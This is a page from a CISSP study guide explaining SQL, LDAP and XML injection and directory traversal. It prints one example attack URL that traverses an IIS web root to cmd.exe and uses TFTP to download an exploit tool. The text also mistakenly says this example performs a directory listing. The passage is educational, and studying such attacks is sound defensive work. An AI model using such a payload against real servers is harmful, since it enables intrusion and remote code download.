2 cissp ® Official Study Guide Eighth Edition

Assess and Mitigate Vulnerabilities in Web-Based Systems 
363
Ultimately, SQL injection is a vulnerability of the script used to handle the interaction 
between a front end (typically a web server) and the backend database. If the script was 
written defensively and included code to escape (invalidate or reject) metacharacters, SQL 
injection would not be possible.
LDAP injection
is a variation of an input injection attack; however, the focus of the 
attack is on the back end of an LDAP directory service rather than a database server. If a 
web server front end uses a script to craft LDAP statements based on input from a user, 
then LDAP injection is potentially a threat. Just as with SQL injection, sanitization of input 
and defensive coding are essential to eliminate this threat.
XML injection
is another variant of SQL injection, where the backend target is an XML 
application. Again, input sanitization is necessary to eliminate this threat.
directory Traversal/Command Injection
A 
directory traversal
is an attack that enables an attacker to jump out of the web root 
directory structure and into any other part of the filesystem hosted by the web server’s 
host OS. A common, but historical, version of this attack was against IIS 4.0, hosted by 
Windows NT 4.0 Server. The attack used a modified URL to directory-traverse out of the 
web root, into the main OS folders, in order to access the command prompt executable. 
Here’s an example:
http://victim.com/scripts/..% c0 % af../..% c0 % af../..% c0 % af../..% c0 % af../..% c
0 % af../..% c0 % af../winnt/system32/cmd.exe?/c+tftp+-i+get+exploit.exe
This URL includes a Unicode equivalent of the “change to parent directory” command, 
which is 
../
in ASCII, and also notice it uses the metacharacter of percent (
%
). This URL 
not only performed directory traversal but also granted the attacker the ability to perform 
command injection. The example shows a command injection triggering a Trivial File 
Transfer Protocol (TFTP) Get operation to download an exploit tool onto the victim web 
server. Any command that could be executed under the privileges of the IIS service and 
be crafted within the limitations of a uniform resource locator (URL) could be used. The 
example performs a single directory listing of the C root. But with minor tweaking, TFTP 
commands could be used to download hacker tools to the target and subsequently launch 
those tools to grant greater remote control or true command shell access. This attack can 
be stopped with metacharacter escaping or filtering.
Many modern web servers can be vulnerable to variations of this attack as new forms of 
alternate encoding of the change-to-parent command are crafted.

Download 19,3 Mb.

Do'stlaringiz bilan baham: